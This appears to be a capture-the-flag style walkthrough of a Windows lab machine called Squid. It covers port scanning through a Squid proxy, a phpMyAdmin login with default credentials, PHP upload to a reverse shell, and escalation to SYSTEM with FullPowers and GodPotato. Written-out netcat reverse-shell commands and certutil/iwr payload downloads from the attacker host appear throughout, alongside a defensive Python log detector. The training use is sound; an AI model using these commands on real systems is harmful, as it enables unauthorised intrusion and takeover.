# Squid

`squid` `proxy` `phpmyadmin` `nt authority\local service`

* Machine name: Squid
* Difficulty: Easy
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-27 04:59 EDT
Nmap scan report for 192.168.248.189
Host is up (0.034s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3128/tcp  open  http-proxy    Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

### SMB (139/445)

```
┌──(kali㉿kali)-[~]
└─$ smbclient -L //192.168.248.189                   
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED
```

No access.

### HTTP-Proxy (3128): Squid http proxy 4.14

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid>" %}

#### Configure the proxy

**FoxyProxy**

#### Enumerate ports

Note: nmap (through proxychains) does not work here; spose.py has to be used instead.

{% embed url="<https://github.com/aancw/spose>" %}

```
┌──(kali㉿kali)-[~]
└─$ git clone https://github.com/aancw/spose.git     
Cloning into 'spose'...
remote: Enumerating objects: 11, done.
remote: Total 11 (delta 0), reused 0 (delta 0), pack-reused 11
Receiving objects: 100% (11/11), done.

┌──(kali㉿kali)-[~]
└─$ cd spose

┌──(kali㉿kali)-[~/spose]
└─$ python spose.py --proxy http://192.168.248.189:3128 --target 192.168.248.189
Using proxy address http://192.168.248.189:3128
192.168.248.189 3306 seems OPEN 
192.168.248.189 8080 seems OPEN 
```
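The scan above leaves a very recognisable trace on the proxy itself: one client asking Squid for many different ports of a single destination within seconds. As an added defender-side example (not part of the original writeup or of spose), the Python below parses Squid's access.log in its default `squid` logformat and flags that pattern; the log lines are constructed here to mimic the scan, and the client/target addresses are the ones from this writeup.

```python
"""Detect proxy-based port scans in Squid access.log (default 'squid' logformat)."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines (not real logs from the page): the first client walks
# six ports of one host through the proxy, the second just browses a website.
SAMPLE_LOG = """\
1722070765.384     33 192.168.45.158 TCP_MISS/503 4051 GET http://192.168.248.189:21/ - HIER_NONE/- text/html
1722070765.421     35 192.168.45.158 TCP_MISS/503 4051 GET http://192.168.248.189:22/ - HIER_NONE/- text/html
1722070765.458     34 192.168.45.158 TCP_MISS/503 4051 GET http://192.168.248.189:445/ - HIER_NONE/- text/html
1722070765.497     36 192.168.45.158 TCP_MISS/502 3820 GET http://192.168.248.189:3306/ - HIER_DIRECT/192.168.248.189 text/html
1722070765.533     40 192.168.45.158 TCP_MISS/200 1523 GET http://192.168.248.189:8080/ - HIER_DIRECT/192.168.248.189 text/html
1722070765.571     33 192.168.45.158 TCP_MISS/503 4051 GET http://192.168.248.189:8443/ - HIER_NONE/- text/html
1722070790.102    120 10.0.0.7 TCP_MISS/200 9214 GET http://example.com/ - HIER_DIRECT/93.184.216.34 text/html
1722070791.330     98 10.0.0.7 TCP_TUNNEL/200 3000 CONNECT example.com:443 - HIER_DIRECT/93.184.216.34 -
"""

def parse_line(line):
    """Return (ts, client, host, port, http_status) for one line, or None if malformed."""
    f = line.split()
    if len(f) < 10:
        return None
    ts, client, code, method, url = float(f[0]), f[2], f[3], f[5], f[6]
    if method == "CONNECT":            # CONNECT is logged as "host:port" with no scheme
        host, _, port = url.rpartition(":")
    else:
        u = urlsplit(url)
        host = u.hostname or ""
        port = u.port or (443 if u.scheme == "https" else 80)
    return ts, client, host, int(port), int(code.split("/")[1])

def find_proxy_scans(lines, min_ports=5, window=60.0):
    """Map (client, destination host) -> sorted ports for every client that touched
    at least `min_ports` distinct ports of one host within `window` seconds."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            ts, client, host, port, _ = rec
            events[(client, host)].append((ts, port))
    hits = {}
    for key, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):      # sliding window anchored at each event
            seen = {p for t, p in evs[i:] if t - t0 <= window}
            if len(seen) >= min_ports:
                hits[key] = sorted(seen)
                break
    return hits
```

Feed a real file with `find_proxy_scans(open('/var/log/squid/access.log'))`. The scan only works because the proxy is allowed to forward requests to its own host, so tightening Squid's `http_access` destination rules is the fix and this log check is the safety net.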

### HTTP (8080): Wampserver 3.2.3

We go to the phpMyAdmin page.

A quick Google search tells us that the default username is root.

It works!

## Initial access

### phpMyAdmin

We created a database named reverse, then issued an SQL query.

Visiting <http://192.168.248.189:8080/reverse.php> does bring us to the uploaded file.

We can now try to obtain a reverse shell.

{% embed url="<https://www.revshells.com/>" %}

PowerShell base64 (URL-encoded) works.

```
┌──(kali㉿kali)-[~/spose]
└─$ nc -lnvp 1234 
listening on [any] 1234 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50089
whoami
nt authority\local service
```

local.txt is located at `C:\local.txt`.

## Privilege escalation

### nt authority\local service

{% embed url="<https://itm4n.github.io/localservice-privileges/>" %}

{% embed url="<https://github.com/itm4n/FullPowers>" %}

We downloaded FullPowers.exe to our Kali machine, started a Python HTTP server and transferred the file to the target. We also transferred nc.exe.

We ran the exploit and started a listener.

```
┌──(kali㉿kali)-[~]
└─$ python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.248.189 - - [27/Jul/2024 06:31:23] "GET /Tools/FullPowers.exe HTTP/1.1" 200 -
```

```
PS C:\wamp\www> iwr -uri http://192.168.45.158:80/Tools/FullPowers.exe -Outfile FullPowers.exe
PS C:\wamp\www> ./FullPowers.exe -c "nc.exe 192.168.45.158 1235 -e cmd"
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235 
listening on [any] 1235 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50093
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\local service

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
```

`SeImpersonatePrivilege` is enabled, so we can exploit it.

### SeImpersonatePrivilege

{% embed url="<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer>" %}

```
C:\Windows\system32>cd /wamp/www
C:\wamp\www>certutil -f -urlcache http://192.168.45.158:80/Tools/GodPotato.exe

C:\wamp\www>god.exe -cmd "nc.exe 192.168.45.158 1236 -e cmd"
god.exe -cmd "nc.exe 192.168.45.158 1236 -e cmd"
[*] CombaseModule: 0x140733990830080
[*] DispatchTable: 0x140733993143488
[*] UseProtseqFunction: 0x140733992520752
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\d5fdf30f-3e3c-4561-8f94-c3ed68b3416c\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000bc02-0020-ffff-2bec-e3f4dd11ef72
[*] DCOM obj OXID: 0x1ba1d069c31f35a5
[*] DCOM obj OID: 0x638f6af33d820e90
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 876 Token:0x804  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1528
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1236 
listening on [any] 1236 ...
connect to [192.168.45.158] from (UNKNOWN) [192.168.248.189] 50107
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\wamp\www>whoami
whoami
nt authority\system
```

We are nt authority\system!
